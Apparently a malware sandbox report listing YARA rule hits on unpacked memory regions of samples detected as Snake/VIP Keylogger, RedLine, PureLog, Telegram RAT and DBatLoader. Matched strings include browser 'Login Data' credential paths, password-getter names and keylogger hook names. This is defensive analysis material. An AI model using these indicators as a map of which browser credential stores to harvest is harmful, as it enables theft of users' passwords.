16.2.jphwmyiA.pif.1cb10000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.jphwmyiA.pif.1cb10000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.jphwmyiA.pif.1cb10000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.jphwmyiA.pif.1cb10000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.jphwmyiA.pif.1cb10000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
16.2.jphwmyiA.pif.1cb10000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
16.2.jphwmyiA.pif.1cb10000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
20.2.jphwmyiA.pif.2d020000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.jphwmyiA.pif.2d020000.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.jphwmyiA.pif.2d020000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.jphwmyiA.pif.2d020000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.jphwmyiA.pif.2d020000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
20.2.jphwmyiA.pif.2d020000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
20.2.jphwmyiA.pif.2d020000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
12.2.jphwmyiA.pif.28fc0000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.28fc0000.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.jphwmyiA.pif.28fc0000.6.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.28fc0000.6.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.28fc0000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.3.jphwmyiA.pif.24507b80.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.3.jphwmyiA.pif.24507b80.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.3.jphwmyiA.pif.24507b80.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.3.jphwmyiA.pif.24507b80.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.3.jphwmyiA.pif.24507b80.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.28fc0000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
20.2.jphwmyiA.pif.2a0399de.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.jphwmyiA.pif.2a0399de.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
20.2.jphwmyiA.pif.2a0399de.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.jphwmyiA.pif.2a0399de.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.jphwmyiA.pif.2a0399de.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.28fc0000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
12.3.jphwmyiA.pif.24507b80.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
20.2.jphwmyiA.pif.2a0399de.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
12.2.jphwmyiA.pif.28fc0000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
20.2.jphwmyiA.pif.2a0399de.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
12.3.jphwmyiA.pif.24507b80.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
20.2.jphwmyiA.pif.2a0399de.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d312:$s1: UnHook 0x3d2ae:$s2: SetHook 0x3d2e7:$s3: CallNextHook 0x3d276:$s4: _hook
12.3.jphwmyiA.pif.24507b80.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
8.2.brightness.exe.22c65a8.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
12.2.jphwmyiA.pif.25f299de.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.25f299de.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.25f299de.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.25f299de.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.25f299de.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
12.2.jphwmyiA.pif.25f299de.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
12.2.jphwmyiA.pif.25f299de.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
8.2.brightness.exe.21659f78.10.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
16.3.jphwmyiA.pif.187dcca8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.3.jphwmyiA.pif.187dcca8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.3.jphwmyiA.pif.187dcca8.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.3.jphwmyiA.pif.187dcca8.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.3.jphwmyiA.pif.187dcca8.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.3.jphwmyiA.pif.187dcca8.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
16.3.jphwmyiA.pif.187dcca8.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
16.3.jphwmyiA.pif.187dcca8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c42a:$s1: UnHook 0x3c3c6:$s2: SetHook 0x3c3ff:$s3: CallNextHook 0x3c38e:$s4: _hook
16.2.jphwmyiA.pif.1cb10ee8.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.jphwmyiA.pif.1cb10ee8.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.jphwmyiA.pif.1cb10ee8.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.jphwmyiA.pif.1cb10ee8.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.2.jphwmyiA.pif.1cb10ee8.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
16.2.jphwmyiA.pif.1cb10ee8.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
16.2.jphwmyiA.pif.1cb10ee8.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
20.2.jphwmyiA.pif.2c9b0000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.jphwmyiA.pif.2c9b0000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.jphwmyiA.pif.2c9b0000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.jphwmyiA.pif.2c9b0000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.Aiymwhpj.PIF.211f67a8.6.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x59ce0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x3ccb0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x3d330:$s3: 83 EC 38 53 B0 B6 88 44 24 2B 88 44 24 2F B0 D9 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x5b9ba:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x5b600:$s5: delete[] 0x1de88:$s6: constructor or from DllMain. 0x5aab8:$s6: constructor or from DllMain.
12.2.jphwmyiA.pif.28730000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.28730000.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.jphwmyiA.pif.28730000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.28730000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.28730000.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.brightness.exe.2830000.2.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
12.2.jphwmyiA.pif.28730000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f76a:$a1: get_encryptedPassword 0x3f73e:$a2: get_encryptedUsername 0x3f802:$a3: get_timePasswordChanged 0x3f71a:$a4: get_passwordField 0x3f780:$a5: set_encryptedPassword 0x3f54d:$a7: get_logins 0x3ab9a:$a10: KeyLoggerEventArgs 0x3ab69:$a11: KeyLoggerEventArgsEventHandler 0x3f621:$a13: _encryptedPassword
12.2.jphwmyiA.pif.28730000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4a86e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49f11:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a16e:$a4: \Orbitum\User Data\Default\Login Data 0x4ab4d:$a5: \Kometa\User Data\Default\Login Data
16.3.jphwmyiA.pif.187dcca8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.3.jphwmyiA.pif.187dcca8.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.3.jphwmyiA.pif.187dcca8.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.3.jphwmyiA.pif.187dcca8.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
16.3.jphwmyiA.pif.187dcca8.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
12.2.jphwmyiA.pif.28730ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.28730ee8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
12.2.jphwmyiA.pif.28730ee8.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.28730ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.28730ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.28730ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3e882:$a1: get_encryptedPassword 0x3e856:$a2: get_encryptedUsername 0x3e91a:$a3: get_timePasswordChanged 0x3e832:$a4: get_passwordField 0x3e898:$a5: set_encryptedPassword 0x3e665:$a7: get_logins 0x39cb2:$a10: KeyLoggerEventArgs 0x39c81:$a11: KeyLoggerEventArgsEventHandler 0x3e739:$a13: _encryptedPassword
16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ca82:$a1: get_encryptedPassword 0x3ca56:$a2: get_encryptedUsername 0x3cb1a:$a3: get_timePasswordChanged 0x3ca32:$a4: get_passwordField 0x3ca98:$a5: set_encryptedPassword 0x3c865:$a7: get_logins 0x37eb2:$a10: KeyLoggerEventArgs 0x37e81:$a11: KeyLoggerEventArgsEventHandler 0x3c939:$a13: _encryptedPassword
20.2.jphwmyiA.pif.2c9b0000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d96a:$a1: get_encryptedPassword 0x3d93e:$a2: get_encryptedUsername 0x3da02:$a3: get_timePasswordChanged 0x3d91a:$a4: get_passwordField 0x3d980:$a5: set_encryptedPassword 0x3d74d:$a7: get_logins 0x38d9a:$a10: KeyLoggerEventArgs 0x38d69:$a11: KeyLoggerEventArgsEventHandler 0x3d821:$a13: _encryptedPassword
20.2.jphwmyiA.pif.2c9b0000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48a6e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x48111:$a3: \Google\Chrome\User Data\Default\Login Data 0x4836e:$a4: \Orbitum\User Data\Default\Login Data 0x48d4d:$a5: \Kometa\User Data\Default\Login Data
16.3.jphwmyiA.pif.187dcca8.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
20.2.jphwmyiA.pif.2c9b0000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b512:$s1: UnHook 0x3b4ae:$s2: SetHook 0x3b4e7:$s3: CallNextHook 0x3b476:$s4: _hook
16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.28730ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49986:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49029:$a3: \Google\Chrome\User Data\Default\Login Data 0x49286:$a4: \Orbitum\User Data\Default\Login Data 0x49c65:$a5: \Kometa\User Data\Default\Login Data
20.2.jphwmyiA.pif.2a03a8c6.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47b86:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47229:$a3: \Google\Chrome\User Data\Default\Login Data 0x47486:$a4: \Orbitum\User Data\Default\Login Data 0x47e65:$a5: \Kometa\User Data\Default\Login Data
16.2.jphwmyiA.pif.1a1d99de.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
16.2.jphwmyiA.pif.1a1d99de.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
16.2.jphwmyiA.pif.1a1d99de.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
16.2.jphwmyiA.pif.1a1d99de.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
12.2.jphwmyiA.pif.28fc0000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
12.2.jphwmyiA.pif.28fc0000.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
12.2.jphwmyiA.pif.28fc0000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
12.2.jphwmyiA.pif.28fc0000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
20.2.jphwmyiA.pif.2a03a8c6.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
16.3.jphwmyiA.pif.187dcca8.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a62a:$s1: UnHook 0x3a5c6:$s2: SetHook 0x3a5ff:$s3: CallNextHook 0x3a58e:$s4: _hook
